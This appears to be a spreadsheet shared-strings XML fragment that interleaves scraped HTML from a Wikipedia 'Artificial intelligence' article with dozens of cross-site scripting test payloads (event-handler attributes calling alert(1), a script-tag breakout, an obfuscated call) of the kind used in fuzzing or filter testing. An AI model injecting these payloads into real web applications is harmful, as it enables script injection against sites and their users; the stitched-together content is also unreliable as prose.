    <t xml:space="preserve">The programs described are &lt;a href="/wiki/Arthur_Samuel" title="Arthur Samuel"&gt;Arthur Samuel &lt;/a&gt;'s checkers program for the &lt;a href="/wiki/IBM_701" title="IBM 701"&gt;IBM 701 &lt;/a&gt;, &lt;a href="/wiki/Daniel_Bobrow" class="mw-redirect" title="Daniel Bobrow"&gt;Daniel Bobrow &lt;/a&gt;'s &lt;a href="/wiki/STUDENT_(computer_program)" title="STUDENT (computer program)"&gt;STUDENT &lt;/a&gt;, &lt;a href="/wiki/Allen_Newell" title="Allen Newell"&gt;Newell &lt;/a&gt; and &lt;a href="/wiki/Herbert_A._Simon" title="Herbert A. Simon"&gt;Simon &lt;/a&gt;'s &lt;a href="/wiki/Logic_Theorist" title="Logic Theorist"&gt;Logic Theorist &lt;/a&gt; and &lt;a href="/wiki/Terry_Winograd" title="Terry Winograd"&gt;Terry Winograd &lt;/a&gt;'s &lt;a href="/wiki/SHRDLU" title="SHRDLU"&gt;SHRDLU &lt;/a&gt;. </t>
  </si>
  <si>
    <t>&lt;time oncut="alert(1)" contenteditable&gt;test&lt;/time&gt;</t>
  </si>
  <si>
    <t>&lt;plaintext draggable="true" ondragend="alert(1)"&gt;test&lt;/plaintext&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Jaan_Tallinn" title="Jaan Tallinn"&gt;Jaan Tallinn &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-328"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-328"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;th onmouseenter="alert(1)"&gt;test&lt;/th&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;&lt;a href="/wiki/Graham_Oppy" title="Graham Oppy"&gt;Graham Oppy &lt;/a&gt; (20 January 2015). &lt;a rel="nofollow" class="external text" href="http://plato.stanford.edu/entries/goedel-incompleteness/#GdeArgAgaMec"&gt;"Gödel's Incompleteness Theorems" &lt;/a&gt;. &lt;i&gt;&lt;a href="/wiki/Stanford_Encyclopedia_of_Philosophy" title="Stanford Encyclopedia of Philosophy"&gt;Stanford Encyclopedia of Philosophy &lt;/a&gt; &lt;/i&gt;&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;27 April </t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;a href="/wiki/Financial_institution" title="Financial institution"&gt;Financial institutions &lt;/a&gt; have long used &lt;a href="/wiki/Artificial_neural_network" title="Artificial neural network"&gt;artificial neural network &lt;/a&gt; systems to detect charges or claims outside of the norm, flagging these for human investigation. The use of AI in &lt;a href="/wiki/Banking" class="mw-redirect" title="Banking"&gt;banking &lt;/a&gt; can be traced back to 1987 when &lt;a href="/wiki/Security_Pacific_National_Bank" class="mw-redirect" title="Security Pacific National Bank"&gt;Security Pacific National Bank &lt;/a&gt; in US set-up a Fraud Prevention Task force to counter the unauthorized use of debit cards.&lt;sup id="cite_ref-314" class="reference"&gt;&lt;a href="#cite_note-314"&gt;&amp;#91;303&amp;#93; &lt;/a&gt; &lt;/sup&gt; Programs like Kasisto and Moneystream are using AI in financial services.</t>
  </si>
  <si>
    <t>top[8680439..toString(30)](1)</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;div style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;base draggable="true" ondragstart="alert(1)"&gt;test&lt;/base&gt;</t>
  </si>
  <si>
    <t>&lt;slot onkeypress="alert(1)" contenteditable&gt;test&lt;/slot&gt;</t>
  </si>
  <si>
    <t>&lt;progress draggable="true" ondragleave="alert(1)"&gt;test&lt;/progress&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;a href="/wiki/G%C3%B6del%27s_incompleteness_theorems" title="Gödel&amp;#39;s incompleteness theorems"&gt;Incompleteness theorem &lt;/a&gt;&lt;span class="nowrap"&gt;&amp;#160; </t>
  </si>
  <si>
    <t>&lt;IMG SRC= onmouseover="alert('xxs')"&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFCrevier1993"&gt;Crevier 1993 &lt;/a&gt;, p.&amp;#160;24 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;figcaption onpointerenter=alert(1)&gt;XSS&lt;/figcaption&gt;</t>
  </si>
  <si>
    <t>&lt;rb onmouseenter="alert(1)"&gt;test&lt;/rb&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h3&gt;&lt;span class="mw-headline" id="Probabilistic_methods_for_uncertain_reasoning"&gt;Probabilistic methods for uncertain reasoning </t>
  </si>
  <si>
    <t>&lt;title&gt;Artificial intelligence - Wikipedia &lt;/title&gt;</t>
  </si>
  <si>
    <t>&lt;code onpointerout=alert(1)&gt;XSS&lt;/code&gt;</t>
  </si>
  <si>
    <t>&lt;marquee draggable="true" ondragend="alert(1)"&gt;test&lt;/marquee&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;embed id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/embed&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;th onload=alert(1)&gt;&lt;/th&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;a href="/wiki/Dewey_Decimal_Classification" title="Dewey Decimal Classification"&gt;Dewey Decimal Classification &lt;/a&gt;&lt;span class="nowrap"&gt;&amp;#160; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Software_maintenance" title="Software maintenance"&gt;Software maintenance &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;input onfocusout=alert(1) id=x&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;noembed onmouseover="alert(1)"&gt;test&lt;/noembed&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" ondragenter="alert(1)"&gt;test&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;shadow draggable="true" ondrag="alert(1)"&gt;test&lt;/shadow&gt;</t>
  </si>
  <si>
    <t>&lt;shadow onkeyup="alert(1)" contenteditable&gt;test&lt;/shadow&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Foundationalism" title="Foundationalism"&gt;Foundationalism &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;embed ondblclick="alert(1)"&gt;test&lt;/embed&gt;</t>
  </si>
  <si>
    <t>&lt;audio autoplay onplay=alert(1)&gt;&lt;source src="validaudio.wav" type="audio/wav"&gt;&lt;/audio&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt;&lt;tr&gt;&lt;th scope="row" class="navbox-group" style="width:1%"&gt;Organizations &lt;/th&gt;&lt;td class="navbox-list navbox-even hlist" style="text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px"&gt;</t>
  </si>
  <si>
    <t>Multi-agent planning and emergent behavior:</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;Poria, Soujanya; Cambria, Erik; Bajpai, Rajiv; Hussain, Amir (September 2017). "A review of affective computing: From unimodal analysis to multimodal fusion". &lt;i&gt;Information Fusion &lt;/i&gt;. &lt;b&gt;37 &lt;/b&gt;: 98–125. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1016%2Fj.inffus.2017.02.003"&gt;10.1016/j.inffus.2017.02.003 &lt;/a&gt;. &lt;a href="/wiki/Handle_System" title="Handle System"&gt;hdl &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="//hdl.handle.net/1893%2F25490"&gt;1893/25490 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Information+Fusion&amp;amp;rft.atitle=A+review+of+affective+computing%3A+From+unimodal+analysis+to+multimodal+fusion&amp;amp;rft.volume=37&amp;amp;rft.pages=98-125&amp;amp;rft.date=2017-09&amp;amp;rft_id=info%3Ahdl%2F1893%2F25490&amp;amp;rft_id=info%3Adoi%2F10.1016%2Fj.inffus.2017.02.003&amp;amp;rft.aulast=Poria&amp;amp;rft.aufirst=Soujanya&amp;amp;rft.au=Cambria%2C+Erik&amp;amp;rft.au=Bajpai%2C+Rajiv&amp;amp;rft.au=Hussain%2C+Amir&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, chpt. 3–9, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;dt&gt;&lt;a class="reference internal" href="topics/benchmarking.html"&gt;&lt;span class="doc"&gt;Benchmarking</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;input id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/input&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h3&gt;&lt;span class="mw-headline" id="Integrating_the_approaches"&gt;Integrating the approaches </t>
  </si>
  <si>
    <t>&lt;param draggable="true" ondragleave="alert(1)"&gt;test&lt;/param&gt;</t>
  </si>
  <si>
    <t>&lt;xmp draggable="true" ondragenter="alert(1)"&gt;test&lt;/xmp&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Probability" title="Probability"&gt;Probability &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;abbr oncontextmenu="alert(1)"&gt;test&lt;/abbr&gt;</t>
  </si>
  <si>
    <t>&lt;svg onpointerover=alert(1)&gt;XSS&lt;/svg&gt;</t>
  </si>
  <si>
    <t>&lt;div role="navigation" class="navbox" aria-labelledby="Links_to_related_articles" style="padding:3px"&gt;&lt;table class="nowraplinks mw-collapsible mw-collapsed navbox-inner" style="border-spacing:0;background:transparent;color:inherit"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;th scope="col" class="navbox-title" colspan="2" style="background:#e8e8ff;"&gt;</t>
  </si>
  <si>
    <t>&lt;section ondblclick="alert(1)"&gt;test&lt;/section&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-2 tocsection-5"&gt;&lt;a href="#Reasoning,_problem_solving"&gt;&lt;span class="tocnumber"&gt;4.1 </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Rhetoric_of_science" title="Rhetoric of science"&gt;Rhetoric of science &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite class="citation book"&gt;&lt;a href="/wiki/Patrick_Winston" title="Patrick Winston"&gt;Winston, Patrick Henry &lt;/a&gt; (1984). &lt;a rel="nofollow" class="external text" href="https://archive.org/details/artificialintell00wins"&gt;&lt;i&gt;Artificial Intelligence &lt;/i&gt; &lt;/a&gt;. Reading, MA: Addison-Wesley. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-0-201-08259-3" title="Special:BookSources/978-0-201-08259-3"&gt;&lt;bdi&gt;978-0-201-08259-3 &lt;/bdi&gt; &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=Artificial+Intelligence&amp;amp;rft.place=Reading%2C+MA&amp;amp;rft.pub=Addison-Wesley&amp;amp;rft.date=1984&amp;amp;rft.isbn=978-0-201-08259-3&amp;amp;rft.aulast=Winston&amp;amp;rft.aufirst=Patrick+Henry&amp;amp;rft_id=https%3A%2F%2Farchive.org%2Fdetails%2Fartificialintell00wins&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;noscript onkeyup="alert(1)" contenteditable&gt;test&lt;/noscript&gt;</t>
  </si>
  <si>
    <t>&lt;content onpointerup=alert(1)&gt;XSS&lt;/content&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h2&gt;&lt;span class="mw-headline" id="Philosophy_and_ethics"&gt;Philosophy and ethics </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;legend id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/legend&gt;</t>
  </si>
  <si>
    <t>&lt;li onpointerover=alert(1)&gt;XSS&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;noframes draggable="true" ondragenter="alert(1)"&gt;test&lt;/noframes&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Heuristic" title="Heuristic"&gt;Heuristic &lt;/a&gt; or informed searches (e.g., greedy &lt;a href="/wiki/Best-first_search" title="Best-first search"&gt;best first &lt;/a&gt; and &lt;a href="/wiki/A*_search_algorithm" title="A* search algorithm"&gt;A* &lt;/a&gt;):</t>
  </si>
  <si>
    <t>&lt;source onkeydown="alert(1)" contenteditable&gt;test&lt;/source&gt;</t>
  </si>
  <si>
    <t>&lt;pre ondblclick="alert(1)"&gt;test&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;ul onbeforecopy="alert(1)" contenteditable&gt;test&lt;/ul&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div class="thumbinner" style="width:222px;"&gt;&lt;a href="/wiki/File:Artificial_neural_network.svg" class="image"&gt;&lt;img alt="" src="//upload.wikimedia.org/wikipedia/commons/thumb/e/e4/Artificial_neural_network.svg/220px-Artificial_neural_network.svg.png" decoding="async" width="220" height="196" class="thumbimage" srcset="//upload.wikimedia.org/wikipedia/commons/thumb/e/e4/Artificial_neural_network.svg/330px-Artificial_neural_network.svg.png 1.5x, //upload.wikimedia.org/wikipedia/commons/thumb/e/e4/Artificial_neural_network.svg/440px-Artificial_neural_network.svg.png 2x" data-file-width="560" data-file-height="500" /&gt; &lt;/a&gt;  &lt;div class="thumbcaption"&gt;</t>
  </si>
  <si>
    <t>&lt;cite onbeforepaste="alert(1)" contenteditable&gt;test&lt;/cite&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;canvas onload=alert(1)&gt;&lt;/canvas&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Autonomous_underwater_vehicle" title="Autonomous underwater vehicle"&gt;Underwater &lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;q onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/q&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;col onpaste="alert(1)" contenteditable&gt;test&lt;/col&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;noembed ondragover=alert(1) contenteditable&gt;drop here&lt;/noembed&gt;</t>
  </si>
  <si>
    <t>&lt;applet onblur=alert(1) tabindex=1 id=x&gt;&lt;/applet&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;fieldset onmousedown="alert(1)"&gt;test&lt;/fieldset&gt;</t>
  </si>
  <si>
    <t>&lt;slot onbeforecopy="alert(1)" contenteditable&gt;test&lt;/slot&gt;</t>
  </si>
  <si>
    <t>&lt;area onpointerout=alert(1)&gt;XSS&lt;/area&gt;</t>
  </si>
  <si>
    <t>&lt;b draggable="true" ondragend="alert(1)"&gt;test&lt;/b&gt;</t>
  </si>
  <si>
    <t>&lt;ul onkeyup="alert(1)" contenteditable&gt;test&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;command onpointermove=alert(1)&gt;XSS&lt;/command&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation news"&gt;&lt;a rel="nofollow" class="external text" href="https://www.economist.com/news/special-report/21735478-autonomous-robots-and-swarms-will-change-nature-warfare-getting-grips"&gt;"Getting to grips with military robotics" &lt;/a&gt;. &lt;i&gt;The Economist &lt;/i&gt;. 25 January 2018&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;7 February </t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;dfn onload=alert(1)&gt;&lt;/dfn&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Search-185"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Search_185-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;video draggable="true" ondragenter="alert(1)"&gt;test&lt;/video&gt;</t>
  </si>
  <si>
    <t>&lt;meter onpointerleave=alert(1)&gt;XSS&lt;/meter&gt;</t>
  </si>
  <si>
    <t>&lt;rb onblur=alert(1) tabindex=1 id=x&gt;&lt;/rb&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;abbr onpointerenter=alert(1)&gt;XSS&lt;/abbr&gt;</t>
  </si>
  <si>
    <t>&lt;thead onpointermove=alert(1)&gt;XSS&lt;/thead&gt;</t>
  </si>
  <si>
    <t>&lt;section onpointerover=alert(1)&gt;XSS&lt;/section&gt;</t>
  </si>
  <si>
    <t>&lt;option onmousemove="alert(1)"&gt;test&lt;/option&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div class="magnify"&gt;&lt;a href="/wiki/File:GFO_taxonomy_tree.png" class="internal" title="Enlarge"&gt; &lt;/a&gt; &lt;/div&gt;An ontology represents knowledge as a set of concepts within a domain and the relationships between those concepts. &lt;/div&gt; &lt;/div&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;label onkeyup="alert(1)" contenteditable&gt;test&lt;/label&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;i&gt;Science &lt;/i&gt;. &lt;b&gt;291 &lt;/b&gt; (5504): 599–600. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1126%2Fscience.291.5504.599"&gt;10.1126/science.291.5504.599 &lt;/a&gt;. &lt;a href="/wiki/PubMed_Identifier" class="mw-redirect" title="PubMed Identifier"&gt;PMID &lt;/a&gt;&amp;#160;&lt;a rel="nofollow" class="external text" href="//pubmed.ncbi.nlm.nih.gov/11229402"&gt;11229402 &lt;/a&gt; &amp;#8211; via msu.edu. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Science&amp;amp;rft.atitle=Autonomous+mental+development+by+robots+and+animals&amp;amp;rft.volume=291&amp;amp;rft.issue=5504&amp;amp;rft.pages=599-600&amp;amp;rft.date=2001&amp;amp;rft_id=info%3Adoi%2F10.1126%2Fscience.291.5504.599&amp;amp;rft_id=info%3Apmid%2F11229402&amp;amp;rft.aulast=Weng&amp;amp;rft.aufirst=J.&amp;amp;rft.au=McClelland&amp;amp;rft.au=Pentland%2C+A.&amp;amp;rft.au=Sporns%2C+O.&amp;amp;rft.au=Stockman%2C+I.&amp;amp;rft.au=Sur%2C+M.&amp;amp;rft.au=Thelen%2C+E.&amp;amp;rft_id=http%3A%2F%2Fwww.cse.msu.edu%2Fdl%2FSciencePaper.pdf&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;aside style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/aside&gt;</t>
  </si>
  <si>
    <t>&lt;thead onmouseleave="alert(1)"&gt;test&lt;/thead&gt;</t>
  </si>
  <si>
    <t>&lt;ul onmousedown="alert(1)"&gt;test&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;col ondblclick="alert(1)"&gt;test&lt;/col&gt;</t>
  </si>
  <si>
    <t>&lt;meter oncontextmenu="alert(1)"&gt;test&lt;/meter&gt;</t>
  </si>
  <si>
    <t>&lt;footer onmouseover="alert(1)"&gt;test&lt;/footer&gt;</t>
  </si>
  <si>
    <t>&lt;listing onpaste="alert(1)" contenteditable&gt;test&lt;/listing&gt;</t>
  </si>
  <si>
    <t>&lt;s draggable="true" ondragstart="alert(1)"&gt;test&lt;/s&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">					&lt;span id='mw-fr-revisiontoggle' aria-disabled='false' title='show/hide details'class='fr-toggle-arrow oo-ui-widget oo-ui-widget-enabled oo-ui-indicatorElement-indicator oo-ui-indicator-down oo-ui-indicatorElement oo-ui-labelElement-invisible oo-ui-indicatorWidget'&gt; </t>
  </si>
  <si>
    <t>&lt;code onkeyup="alert(1)" contenteditable&gt;test&lt;/code&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;map style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/map&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">      &lt;a href="https://github.com/scrapy/scrapy/blob/2.0/docs/index.rst" class="fa fa-github"&gt; Edit on GitHub&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;video onbeforecut="alert(1)" contenteditable&gt;test&lt;/video&gt;</t>
  </si>
  <si>
    <t>&lt;img onclick="alert(1)"&gt;test&lt;/img&gt;</t>
  </si>
  <si>
    <t>&lt;img onpointerdown=alert(1)&gt;XSS&lt;/img&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;acronym style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/acronym&gt;</t>
  </si>
  <si>
    <t>&lt;caption onmousemove="alert(1)"&gt;test&lt;/caption&gt;</t>
  </si>
  <si>
    <t>&lt;kbd oncut="alert(1)" contenteditable&gt;test&lt;/kbd&gt;</t>
  </si>
  <si>
    <t>&lt;td onpointerout=alert(1)&gt;XSS&lt;/td&gt;</t>
  </si>
  <si>
    <t>&lt;wbr onpointerleave=alert(1)&gt;XSS&lt;/wbr&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Testability" title="Testability"&gt;Testability &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;embed onmouseup="alert(1)"&gt;test&lt;/embed&gt;</t>
  </si>
  <si>
    <t>&lt;wbr id=x tabindex=1 onfocus=alert(1)&gt;&lt;/wbr&gt;</t>
  </si>
  <si>
    <t>&lt;sub onpointerleave=alert(1)&gt;XSS&lt;/sub&gt;</t>
  </si>
  <si>
    <t>&lt;base onmousedown="alert(1)"&gt;test&lt;/base&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-GOFAI-157"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-GOFAI_157-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Technological_unemployment" title="Technological unemployment"&gt;Technological unemployment &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-FOOTNOTEMcCorduck2004480–483-44"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-FOOTNOTEMcCorduck2004480–483_44-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;/TITLE&gt;&lt;SCRIPT&gt;alert("");&lt;/SCRIPT&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;keygen style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/keygen&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;isindex id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/isindex&gt;</t>
  </si>
  <si>
    <t>&lt;aside draggable="true" ondragenter="alert(1)"&gt;test&lt;/aside&gt;</t>
  </si>
  <si>
    <t>&lt;caption onbeforecopy="alert(1)" contenteditable&gt;test&lt;/caption&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Audit </t>
  </si>
  <si>
    <t>&lt;picture ondblclick="alert(1)"&gt;test&lt;/picture&gt;</t>
  </si>
  <si>
    <t>&lt;figcaption onpointerover=alert(1)&gt;XSS&lt;/figcaption&gt;</t>
  </si>
  <si>
    <t>&lt;dir onmouseup="alert(1)"&gt;test&lt;/dir&gt;</t>
  </si>
  <si>
    <t>&lt;thead onmouseover="alert(1)"&gt;test&lt;/thead&gt;</t>
  </si>
  <si>
    <t>&lt;bgsound onmouseout="alert(1)"&gt;test&lt;/bgsound&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;meta style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/meta&gt;</t>
  </si>
  <si>
    <t>&lt;tt id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/tt&gt;</t>
  </si>
  <si>
    <t>&lt;input draggable="true" ondragstart="alert(1)"&gt;test&lt;/input&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;Müller, Vincent C.; Bostrom, Nick (2014). &lt;a rel="nofollow" class="external text" href="http://www.sophia.de/pdf/2014_PT-AI_polls.pdf"&gt;"Future Progress in Artificial Intelligence: A Poll Among Experts" &lt;/a&gt; &lt;span class="cs1-format"&gt;(PDF) </t>
  </si>
  <si>
    <t>&lt;keygen oncontextmenu="alert(1)"&gt;test&lt;/keygen&gt;</t>
  </si>
  <si>
    <t>&lt;dd onmouseover="alert(1)"&gt;test&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;img id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/img&gt;</t>
  </si>
  <si>
    <t>&lt;section oncontextmenu="alert(1)"&gt;test&lt;/section&gt;</t>
  </si>
  <si>
    <t>&lt;pre onmouseup="alert(1)"&gt;test&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Alison_Gopnik" title="Alison Gopnik"&gt;Gopnik, Alison &lt;/a&gt;, "Making AI More Human:  Artificial intelligence has staged a revival by starting to incorporate what we know about how children learn", &lt;i&gt;&lt;a href="/wiki/Scientific_American" title="Scientific American"&gt;Scientific American &lt;/a&gt; &lt;/i&gt;, vol. 316, no. 6 (June 2017), pp.&amp;#160;60–65. &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Intelligence" title="Intelligence"&gt;Intelligence &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFGoodman2016" class="citation book"&gt;&lt;a href="/w/index.php?title=Joanna_Goodman&amp;amp;action=edit&amp;amp;redlink=1" class="new" title="Joanna Goodman (page does not exist)"&gt;Goodman, Joanna &lt;/a&gt; (2016). &lt;a rel="nofollow" class="external text" href="https://www.ark-group.com/product/robots-law-how-artificial-intelligence-transforming-legal-services"&gt;&lt;i&gt;Robots in Law: How Artificial Intelligence is Transforming Legal Services &lt;/i&gt; &lt;/a&gt; (1st ed.). Ark Group. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-1-78358-264-8" title="Special:BookSources/978-1-78358-264-8"&gt;&lt;bdi&gt;978-1-78358-264-8 &lt;/bdi&gt; &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=Robots+in+Law%3A+How+Artificial+Intelligence+is+Transforming+Legal+Services&amp;amp;rft.edition=1st&amp;amp;rft.pub=Ark+Group&amp;amp;rft.date=2016&amp;amp;rft.isbn=978-1-78358-264-8&amp;amp;rft.aulast=Goodman&amp;amp;rft.aufirst=Joanna&amp;amp;rft_id=https%3A%2F%2Fwww.ark-group.com%2Fproduct%2Frobots-law-how-artificial-intelligence-transforming-legal-services&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Criticism_of_science" title="Criticism of science"&gt;Criticism of science &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
